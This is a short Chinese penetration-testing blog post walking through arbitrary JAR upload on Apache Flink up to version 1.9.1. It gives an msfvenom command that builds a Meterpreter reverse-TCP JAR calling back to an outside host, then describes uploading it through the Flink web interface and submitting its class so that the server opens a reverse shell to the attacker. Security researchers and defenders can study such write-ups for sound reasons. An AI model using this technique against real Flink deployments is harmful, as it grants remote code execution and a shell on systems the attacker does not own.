Apache Flink 任意JAR包上传

    渗透测试 lz520520 5年前 (2019-11-15) 746次浏览

    时间2019-11-15

    影响范围:<=1.9.1

     

    点击overview,可以看到当前版本,下面演示的是1.8.0

    Apache Flink 任意JAR包上传

     

    1.先通过msf生成一个jar包

    msfvenom -p java/meterpreter/reverse_tcp lhost=1.1.1.1 lport=53 -f jar > msf.jar

     

    2.按图点击新增,上传一个jar包。

    Apache Flink 任意JAR包上传

     

    对应数据包如下,结果可以看到这个文件的完整路径。

    Apache Flink 任意JAR包上传

     

    3.按以下步骤,选择jar包,双击选中类,然后提交给类即可再服务端执行反弹shell。

    Apache Flink 任意JAR包上传

    对应数据包如下

     

    Apache Flink 任意JAR包上传

     

     

    最后就接收到shell了

    Apache Flink 任意JAR包上传

     


    Security , 版权所有丨如未注明 , 均为原创丨
    转载请注明原文链接:Apache Flink 任意JAR包上传
    喜欢 (3)